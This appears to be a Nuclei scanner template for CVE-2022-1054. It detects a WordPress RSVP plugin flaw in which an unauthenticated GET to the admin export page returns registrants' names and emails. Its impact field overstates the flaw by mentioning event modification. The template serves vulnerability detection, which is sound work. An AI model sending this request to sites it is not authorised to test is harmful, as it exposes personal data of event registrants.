id: CVE-2022-1054 info: name: WordPress RSVP and Event Management <2.7.8 - Missing Authorization author: Akincibor severity: medium description: WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events, impact: | An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events. remediation: | Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later. reference: - https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-1054 cwe-id: CWE-862 epss-score: 0.00292 epss-percentile: 0.68538 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: wpchill product: rsvp_and_event_management framework: wordpress tags: cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill http: - method: GET path: - '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export' matchers-condition: and matchers: - type: word part: body words: - 'RSVP Status' - '"First Name"' condition: and - type: status status: - 200 # digest: 4b0a00483046022100d9b2826d5d5e7c47570aaae1f4a6546beae8d6787b59bb6d6f0b947b71c44583022100d4b20922c72ea5c6ea103f9680401d02c4da6928dcabe895aa3100f949751eff:922c64590222798bb761d5b6d8e72950